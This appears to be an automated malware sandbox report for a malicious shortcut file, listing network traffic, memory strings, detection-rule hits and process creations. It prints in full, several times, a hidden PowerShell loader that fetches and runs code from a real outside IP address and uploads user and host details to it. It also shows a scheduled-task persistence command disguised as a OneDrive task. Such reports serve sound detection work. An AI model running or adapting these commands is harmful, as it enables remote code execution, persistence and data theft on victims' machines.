              Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE79787000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000006.00000002.3475796002.000001DE79AC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.3473694398.000001DE797B7000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              Source: global traffic; TCP traffic: 2.59.222.98 ports 43820,0,2,3,4,8
              Source: unknown; Network traffic detected: HTTP traffic on port 58056 -> 43820
              Source: unknown; Network traffic detected: HTTP traffic on port 58057 -> 43820
              Source: global traffic; TCP traffic: 192.168.2.5:58056 -> 2.59.222.98:43820
              Source: global traffic; HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1 | Host: 2.59.222.98:43820 | Connection: Keep-Alive
              Source: global traffic; HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1 | Host: 2.59.222.98:43820 | Connection: Keep-Alive
              Source: Joe Sandbox View; IP Address: 23.41.168.139 23.41.168.139
              Source: Joe Sandbox View; ASN Name: ONEHOSTPLANETUA ONEHOSTPLANETUA
              Source: global traffic; HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1 | Host: armmf.adobe.com | Connection: keep-alive | Accept-Language: en-US,en;q=0.9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | If-None-Match: "78-5faa31cce96da" | If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 23.41.168.139
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; TCP traffic detected without corresponding DNS query: 2.59.222.98
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic; HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1 | Host: armmf.adobe.com | Connection: keep-alive | Accept-Language: en-US,en;q=0.9 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 | Sec-Fetch-Site: same-origin | Sec-Fetch-Mode: no-cors | Sec-Fetch-Dest: empty | Accept-Encoding: gzip, deflate, br | If-None-Match: "78-5faa31cce96da" | If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
              Source: global traffic; HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1 | Host: 2.59.222.98:43820 | Connection: Keep-Alive
              Source: global traffic; HTTP traffic detected: GET /KfngnHbxFHjaucie/page107/upgrade.txt HTTP/1.1 | Host: 2.59.222.98:43820 | Connection: Keep-Alive
              Source: global traffic; DNS traffic detected: DNS query: x1.i.lencr.org
              Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr; String found in binary or memory: http://2.59.222.98:28402/page107
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:28402/page107Bytestf8.GetBytesesX
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:28402/page107X
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62998000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62A22000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:43820
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62A2A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:43820(
              Source: powershell.exe, 00000010.00000002.4521422067.00000107804D8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:43820/KfngnHb
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://2.59.222.98:43820/KfngnHbx
              Source: powershell.exe, 00000010.00000002.4548213654.00000107F8450000.00000004.00000020.00020000.00000000.sdmp, Recorded.vbs.0.dr; String found in binary or memory: http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt
              Source: powershell.exe, 00000006.00000002.3416550367.000001DE5FA85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://2.59.222.98:43820/kfngnhbxfhjaucie/page107/upgrade.txt
              Source: powershell.exe, 00000006.00000002.3475796002.000001DE79A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m1
              Source: svchost.exe, 00000009.00000002.3748403757.0000027DAD800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
              Source: qmgr.db.9.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
              Source: qmgr.db.9.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.0000010780085000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B62031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE613B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078004B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078005E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
              Source: svchost.exe, 00000009.00000003.2101982072.0000027DAD750000.00000004.00000800.00020000.00000000.sdmp, edb.log.9.dr, qmgr.db.9.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE615DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000006.00000002.3417701270.000001DE620D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.4521422067.000001078055F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
              Source: powershell.exe, 00000000.00000002.2091863635.0000026B721E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2091863635.0000026B720AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2066672979.0000026B6227B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71567000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3467819273.000001DE71424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3417701270.000001DE62CF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: qmgr.db.9.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe/C:
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
              Source: powershell.exe, 00000000.00000002.2066672979.0000026B63A25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716

              System Summary

              Source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: unknown | Process created: Commandline size = 25303
              Source: Process Memory Space: powershell.exe PID: 6496, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine | Classification label: mal100.troj.expl.evad.winLNK@28/51@1/3
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\Public\Libraries\Recorded.vbs
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
              Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hqkvfyiw.kd2.ps1
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
              Source: 140AEcuVy7.lnk | ReversingLabs: Detection: 52%
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $temp='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
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /f
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2084 --field-trial-handle=1728,i,12702411498753033684,7387674129069318371,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Recorded.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$flm=$iik.downloaddata('http://2.59.222.98:43820/KfngnHbxFHjaucie/page107/upgrade.txt');if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('http://2.59.222.98:28402/page107',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\document.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN OneDriveCoreTask-S-1-5-21-5466262771-899953646639-1001 /SC minute /mo 4 /tr C:\Users\Public\Libraries\Recorded.vbs /fJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
